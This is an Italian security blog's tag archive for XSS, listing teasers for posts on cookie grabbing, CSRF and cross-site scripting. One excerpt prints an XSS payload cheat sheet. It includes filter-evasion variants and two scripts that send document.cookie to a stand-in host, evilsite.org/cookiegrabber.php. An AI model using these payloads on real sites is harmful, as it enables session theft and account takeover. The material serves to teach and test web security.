Archives

All Posts Tagged Tag: ‘XSS’

Bruce Force Attack

Cookie Grabbing: Come funziona

4

Il cookie grabbing è una tecnica di cracking molto potente, pericolosa, e facile da attuare: consiste, come si capisce dal nome, nel rubare i cookie. Un attacco utilizzato dai crackers in rete si chiama “Cookie Grabbing“, che consiste nel “grabbare” (rubare) i cookie di un utente loggato ad un servizio, e impostarli nel proprio browser in modo da essere loggato …

Read More
Bruce Force Attack

[CSRF] Attacco Cross Site Request Forgery

0

In questo articolo parleremo di un attacco web che può risultare devastante: rientra nella categoria di attacchi SideJacking e viene conosciuto anche come CSRF o XSRF. Questa tipo di attacco, permette ad un malintenzionato di effettuare operazioni al posto della vittima. Che ti di operazioni parliamo? Potenzialmente, a seconda del sito vulnerabile (e delle sue funzioni ovviamente) può a nome …

Read More
Phishing

Codici per trovare una XSS

0

Avevamo promesso qualche giorno fa, di darvi altri esempi su come trovare delle XSS in un sito web. Ecco quindi di seguito, una “cheat sheet” contenente dei codici utilizzati dai “Bug-Hunter” per controllare se un sito web soffre di Cross Site Scripting. Divertitevi! <script>alert(1);</script> <script>alert(‘XSS’);</script> <script src=”http://www.evilsite.org/cookiegrabber.php”></script> <script>location.href=”http://www.evilsite.org/cookiegrabber.php?cookie=”+escape(document.cookie)</script> <scr<script>ipt>alert(‘XSS’);</scr</script>ipt> <script>alert(String.fromCharCode(88,83,83))</script> <img src=foo.png onerror=alert(/xssed/) /> <style>@im\port’\ja\vasc\ript:alert(\”XSS\”)’;</style> <? echo(‘<scr)’; echo(‘ipt>alert(\”XSS\”)</script>’); ?> <marquee><script>alert(‘XSS’)</script></marquee> …

Read More
Phishing

[XSS] Guida Al Cross Site Scripting

2

In questa guida cercheremo di farvi capire il piu possibile sulle XSS ovvero sul Cross Site Scripting, una vulnerabilita facilmente trovabile (e spesso altrettanto facilmente fixabile) nei siti web. Il cross site scripting Fixare una xss Metodi usati dai crackers per sfruttare una XSS Il cross site scripting Il cross site scripting rientra nella categoria di attacchi “code injection”, ovvero “iniezione di …

Read More
Page 1 of 212»